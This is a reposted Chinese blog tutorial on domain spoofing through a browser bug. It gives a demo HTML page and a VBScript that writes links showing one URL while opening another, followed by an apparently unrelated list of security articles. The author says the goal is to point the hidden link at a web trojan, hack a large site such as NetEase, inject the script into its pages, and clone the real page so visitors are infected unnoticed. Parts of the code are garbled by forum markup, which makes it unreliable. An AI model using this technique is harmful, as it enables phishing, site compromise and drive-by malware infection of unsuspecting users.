网络域名欺骗技术实现过程

简介:
网页 木马种植方案一直都存在很大的问题,当然 欺骗 需要技巧也需要时间,我们现在不需要那么麻烦的欺骗,本文就是教大家利用最新 浏览器 漏洞实现域名的欺骗..... 


前言 


域名欺骗有多种实现方法,本文所说的是利用客户端浏览器的漏洞来欺骗用户。 


多数浏览器都会存在这个漏洞,目前暂时还没相应的补丁。漏洞是这样的: 


当用户通过浏览器访问一个url,如果这个url是经过以下的格式构造的,那么浏览器实际将访问经过构造的恶意 页面 ,而用户浏览器的 地址 栏里所显示的将是虚假的url: 


url的构造格式为: 


说明: 


url_1为用户所看到的地址,地址中不可以带"/" 


special_char为一个特殊的字符,即ascii码为1的字符 


url_2为恶意页面地址 


利用过程 


首先请看这个测试页面: 


<html> 

<head> 

<title>域名欺骗技术实例</title> 

</head> 

<body link="#0000ff" alink="#0000ff" vlink="#0000ff"> 

你可以看看这两个链接有什么区别: 

<br> 

<h1>链接1: 

<script language="vbscript" src="deceive.vbs"> 

</script></h1> 

<h1>链接2: 

<a href="_blank ?> [url]www.163.com[/url] " target="_blank"> 

[url]http://www.163.com/[/url] "; target="_blank"  [url]http://ww[/url]  ... ";> 

[url]www.163.com[/url] </a> 

</h1> 

</body> 

</html> 


这个网页源代码,其中链接1指向了一个vbs脚本,而链接2指向的是163站点。如果我们把连接一的vbs脚本改成下列代码: 


''''''''''''''''''deceive.vbs'''''''''''''''''''' 

'(以下请根据实际情况自行修改:) 

url1="http://www.163.com/" 

url2="http://www.google.com/" 

text="http://www.163.com/" 

url="_blank ?>http://";&url1&chr(1)& ... p;url2&"" 

dn="/" 

mouseover=" :window.status='_blank ?> 

http://";&url1&dn&"'""" 

mouseout=" :window.status=''""" 

click=" :navigate('"&url&"')""" 

style="style=""cursor:hand""" 

tag="<span "&style&" "&mouseover&" "&mouseout&" "&click&"> 

<font color=""#0000ff""><u>"&text&"</u> 

</font></span>" 

document.write tag 

'说明: 

'url1是用来欺骗用户的地址. 

'url2是实际访问的地址,可以是网页 木马 、恶意网页等. 

'text是链接的文字. 

'注意:(以上欺骗地址及实际地址不可以加"http://") 

'''''''''''''''''''''''''''''''''''''''cuts here'''''''''''''''''''''''''''''''''''''''''''''''' 


现在大家看到了吧~~当我们点击这个测试页面的时候,链接1指向的是google.com,而且状态栏和地址栏里都显示"_blank> [url]http://www.163.com/[/url] ",链接2却指向163.com。你也许感到不可思议,但这就是域名欺骗漏洞的魅力。 


我们可以想象,如果以上的测试页面中的链接1指向的不是google.com,而是我们的网页木马,那就...... 


不过,一个普通的个人网站没人会看的,这就需要我们把这种假链接添加到别的大网站的页面之中。假设我们入侵了一个比较大的网站,比如网易(哇~~~~~~这时候一只菜鸟推着一车砖头,看着我......)。这时候就可以把它的页面给改了。 


比如有一个文字链接,我们就可以把代码中的"<a href="xxxxx.htm">xxxxxx</a>"改为我们自己的代码:"<script language="vbscript" src="deceive.vbs"></script>"。看到src属性里的deceive.vbs了吗 ?我们要编辑好这个文件,然后上传到要修改的页面目录下。 


这样还不行,我们还要把自己的木马网页的界面修改一下。也就是把原来链接到的页面加入到我们自己的木马网页,并且我们的木马网页里的所有链接等内容要和原来的页面一样,否则就会引起用户的怀疑。现在,我们把google网站的首页源代码全部复制下来,添加到我们的网页木马。把复制下来的代码中的图片或者是链接的文件都修改完整,比如logo.gif改为_blank>/UpLoadFiles/NewsPhoto/comalogo.gif,否则网页就和原来的不一样了(图片显示为红色的×,链接也失效),因为用户打开的是你的站点,而你的站点中并没有logo.gif。都修改好后就可以保存文件了。上传到你的网页空间里。 


至此,我们的工作已经完成。喝一杯咖啡,休息一会...... 


当我们进入这个网站后,点击我们修改过的连接,你会发现和原来的页面几乎就一模一样(当然,也有些细微的区别,不过一般很难觉察)。就当人家在浏览这个网页的时候,他已经在不知不觉中中了木马,而你也开心地笑呢!~





















本文转自starger51CTO博客,原文链接: http://blog.51cto.com/starger/17141,如需转载请自行联系原作者

相关实践学习
基于函数计算快速搭建Hexo博客系统
本场景介绍如何使用阿里云函数计算服务命令行工具快速搭建一个Hexo博客。
相关文章
|
3天前
|
存储 安全 物联网
网络安全与信息安全:防御前线的技术与意识
【5月更文挑战第9天】 在数字化时代,网络安全和信息安全已成为维护个人隐私、企业数据和国家安全的基石。本文将深入探讨网络安全漏洞的概念、加密技术的重要性以及提升安全意识的必要性。通过对这些关键领域的分析,我们将了解如何构建一个更加坚固的信息安全防线,并掌握保护信息不受未授权访问、泄露或破坏的策略和技术。
|
5天前
|
负载均衡 网络协议
虚拟网络技术:bond技术
虚拟网络技术:bond技术
8 0
|
6天前
|
运维 安全 网络协议
即时通讯安全篇(十四):网络端口的安全防护技术实践
网络端口因其数量庞大、端口开放和关闭的影响评估难度大,业务影响程度高、以及异常识别技术复杂度高等特点给网络端口安全防护带来了一定的挑战,如何对端口风险进行有效治理几乎是每个企业安全团队在攻击面管理工作中持续探索的重点项。
17 0
|
6天前
|
安全 物联网 网络安全
网络安全与信息安全:防御前线的关键技术与策略
【5月更文挑战第6天】在数字化时代,网络安全与信息安全已成为保护个人隐私、企业资产和国家安全不可或缺的一环。本文深入探讨了网络安全漏洞的概念、加密技术的进展以及提升安全意识的重要性。通过分析当前网络环境中存在的风险和挑战,文章提出了一系列创新的防御措施和最佳实践,旨在帮助读者构建一个更加安全的网络环境。
|
8天前
|
SQL 安全 算法
网络安全与信息安全:防御前线的技术与意识
【5月更文挑战第4天】在数字化时代,网络安全和信息安全已成为维护网络环境稳定的关键。本文深入探讨了网络安全漏洞的成因、加密技术的应用以及提升安全意识的重要性,旨在为读者提供全面的安全防护策略。通过对常见安全威胁的分析,我们展示了如何运用现代加密技术和安全机制来保护数据和隐私。同时,文章强调了培养个人和组织的安全意识对于构建安全防线的核心作用。
17 0
|
9天前
|
存储 安全 网络安全
网络安全与信息安全:防御前线的技术与意识
【5月更文挑战第3天】 在数字化时代,网络安全和信息安全已成为维护社会稳定、保护个人隐私和企业资产的重要领域。本文深入探讨了网络安全漏洞的成因与影响,加密技术的最新发展以及提升安全意识的必要性。通过对现有威胁的分析,我们强调了构建多层次防御策略的重要性,并提出了相应的技术解决方案和管理措施。
|
10天前
|
存储 SQL 安全
网络安全与信息安全:防御前线的关键技术与策略
【5月更文挑战第2天】 在数字化时代,数据成为了新的货币,而网络安全则是保护这些宝贵资产不受威胁的盾牌。本文将深入探讨网络安全漏洞的本质,分析加密技术如何成为防御体系的核心,并强调提升个人和企业的安全意识在构建坚固防线中的重要性。通过技术性解析和实践策略的分享,旨在为读者提供一套综合性的网络与信息安全解决方案。
|
11天前
|
安全 网络安全
网络安全攻防实战演练:技术探索与实践
【5月更文挑战第1天】网络安全攻防实战演练,通过模拟攻击与防御,提升组织应对网络安全威胁的能力。演练包括准备、攻击、防御和总结四个阶段,涉及环境搭建、攻击技术应用、防御措施执行及后期评估。此类演练有助于检验安全防护能力,提升应急响应速度,暴露系统隐患,加强团队协作,是保障网络安全的关键实践。
|
12天前
|
机器学习/深度学习 自动驾驶 安全
基于深度学习的图像识别技术在自动驾驶系统中的应用网络安全与信息安全:防御前线的关键技术与意识
【4月更文挑战第30天】随着人工智能技术的飞速发展,深度学习已成为推动多个技术领域革新的核心力量。特别是在图像识别领域,深度学习模型已展现出超越传统算法的性能。在自动驾驶系统中,准确的图像识别是确保行车安全和高效导航的基础。本文将探讨深度学习在自动驾驶中图像识别的应用,分析关键技术挑战,并提出未来的发展方向。
|
12天前
|
存储 安全 网络安全
网络安全与信息安全:防御前线的技术与意识
【4月更文挑战第30天】在数字化时代,数据成为了新的货币,而网络安全则是保护这些资产的保险箱。本文深入探讨了网络安全漏洞的成因、加密技术的进展以及提升安全意识的重要性,旨在为读者提供一道防线,帮助他们在网络空间中更安全地存储、传输和处理信息。通过分析当前的威胁景观,我们讨论了如何通过技术手段和行为改变来增强个人和组织的网络防护能力。